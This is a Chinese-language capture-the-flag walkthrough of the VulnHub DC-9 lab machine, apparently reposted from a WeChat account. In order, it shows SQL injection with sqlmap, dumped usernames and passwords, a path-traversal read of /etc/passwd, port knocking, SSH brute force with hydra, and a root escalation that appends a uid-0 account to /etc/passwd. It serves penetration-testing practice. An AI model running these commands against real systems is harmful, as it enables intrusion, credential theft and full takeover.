靶机地址:https://www.vulnhub.com/entry/dc-9,412/
攻击者IP:192.168.56.108 桥接(自动) vmare
受害者IP:192.168.56.123 仅主机 vmbox
参考:https://blog.csdn.net/Auuuuuuuu/article/details/104592327
https://blog.csdn.net/qq_43462485/article/details/109456721
https://blog.csdn.net/JSH_CDX/article/details/105257482
主机发现
端口扫描
目录扫描
后台登陆地址http://192.168.56.123/manage.php
密码爆破
manage.php sql注入
http://192.168.56.123/display.php有目录
可以用名字查询如Julie ,Mary
results可能有sql注入
burp抓包放到2.txt
sqlmap -r 2.txt --batch --dbssqlmap -r 2.txt --batch -D "Staff" --tablessqlmap -r 2.txt --batch -D "Staff" -T "Users" --columns
+--------+----------------------------------+----------+ | UserID | Password | Username | +--------+----------------------------------+----------+ | 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin | +--------+----------------------------------+----------+
md5解密
admin/transorbital1
登陆登陆
文件不存在,猜测可能有文件包含
确实有文件包含漏洞
p?file=../../../../etc/passwd
把用户名和密码放到usr.txt,pwd.txt
sqlmap -r 2.txt--dbssqlmap -r 2.txt-D "users" --tables --batchsqlmap -r 2.txt-D "users" -T "UserDetails"--dump --batch
username:
marymjuliedfredfbarneyrtomcjerrymwilmafbettyrchandlerbjoeytrachelgrossgmonicagphoebebscootsjanitorjanitor2admin
password:
3kfs86sfd468sfdfsd24sfd87sfd1RocksOffTC&TheBoyzB8m#48sdPebblesBamBam01UrAG0D!Passw0rdyN72#dsdILoveRachel3248dsds7ssmellycatsYR3BVxxxw87IlovepeepeeHawaii-Five-0transorbital1
发现无法连接
这个knockd.conf是一种端口试探服务器工具。 它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。 telnet或Putty等客户软件通过向服务器上的端口发送TCP或数据包来启动端口命中, 也可以直接用nc敲击端口。
简单来说就是用来隐藏ssh登陆端口。(也就是我们之前扫描端口时发现22端口阻塞)只有我们按照设定的顺序敲击端口,防火墙才会打开登陆端口。再按照同样的方式可以使防火墙关闭ssh登陆端口,如果别人不知道我们设定的端口敲击顺序,是无法登陆ssh的。
端口敲门
nc/nmap
7469,8475,9842
nc 192.168.56.123 7469nc 192.168.56.123 8475nc 192.168.56.123 9842nmap -p7469 192.168.56.123nmap -p8475 192.168.56.123nmap -p9842 192.168.56.123nmap -p22 192.168.56.123
hydra -L use.txt -P pwd.txt -vV ssh://192.168.56.123:22 -f
重新爆破一下
chandlerb/UrAG0D!joeyt/Passw0rdjanitor/Ilovepeepee
janitor有密码,给添加到pwd.txt
没有权限
hydra -L use.txt -P pwd.txt ssh://192.168.56.123:22
得到新用户
fredf/B4-Tru3-001
发现sudo -l可以使用,得到了一个可以以root身份执行的脚本
提示使用 python test.py 加参数运行,使用find命令找到该文件,查看源代码
find / -name "test.py" 2>/dev/null
该脚本可以将指定内容写到指定文件里,运行脚本时,第一个参数为要读取内容,第二个参数将读取的内容写到指定文件,我们可以通过修改/etc/passwd/文件来实现指定用户是否为root,所以,我们构造一个root权限的用户文件,写入到/etc/passwd文件中,即可成功拿下root
通过向/etc/passwd中添加用户达到提权,直接添加一个还不行,还需要经过加密
-1 :使用md5加密算法-salt :自动插入一个随机数作为文件内容加密openssl passwd -1 -salt hhh 123456echo 'hhh:$1$hhh$kY5dhcOZMbugbkqX07NY1/:0:0:root:/bin/bash' >> /tmp/hhhsudo ./test /tmp/hhh /etc/passwd
原文始发于微信公众号(王之暴龙战神):DC9
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论